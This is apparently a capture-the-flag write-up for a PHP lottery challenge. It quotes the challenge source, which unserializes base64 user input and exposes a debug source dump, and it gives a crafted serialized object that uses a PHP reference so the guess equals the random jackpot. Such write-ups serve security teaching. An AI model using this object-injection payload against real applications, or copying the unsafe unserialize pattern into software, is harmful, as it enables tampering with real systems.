} else { echo"<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>"; } } else { echo"<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>"; } } else { echo""; } ?> <center> <br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2> <p><p><font color='white'>Input your code to win jackpot!</font><p> <form> <input type="text" name="input" /><p><p> <button type="submit" name="btn-submit" value="go">send</button> </form> </center> <?php if (isset($_GET['gen_code']) && !empty($_GET['gen_code'])) { $temp = newObject; $temp->enter=$_GET['gen_code']; $code=base64_encode(serialize($temp)); echo'<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>'; } ?> <center> <font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font> <h3><font color='white'>Take code</font></h3><p> <p><font color='white'>Pick your six numbers (Ex: 150294118876)</font><p> <form> <input type="text" name="gen_code" maxlength="17" /><p><p> <button type="submit" name="btn-submit" value="go">send</button> </form> </center> <?php if(isset($_GET['is_debug']) && $_GET['is_debug']==='1') { show_source(__FILE__); } ?> <!-- GET is_debug=1 --> </body>
So looking at the code it seems that the first step is to send a number like 67 86 93 92 41 76, the server serialize it and base64 encode it and then send it back to us, finally we submit this base64 string and the server decode the base64 , unserialize it and compare the number with the jackpot number.
If we decode the base64 string, the serialized object looks like that:
because the random jackpot value is set after so it override the given value.
So what we need is to set the enter value as a symlink of jackpot value.
Reading PHP Serialization Structure we can see there is an unknow and not well documented feature: Reference. So intead of using a key:value like s:17 meaning we store a string with length of 17 char we can use R:x that mean we want a reference of index x.
So let's built a serialized object with enter value as a reference of jackpot:
1
O:6:"Object":2:{s:7:"jackpot";N;s:5:"enter";R:2;}
When the jackpot variable is then set to the string with the random numbers it'll also effectively set out enter variable to the same string.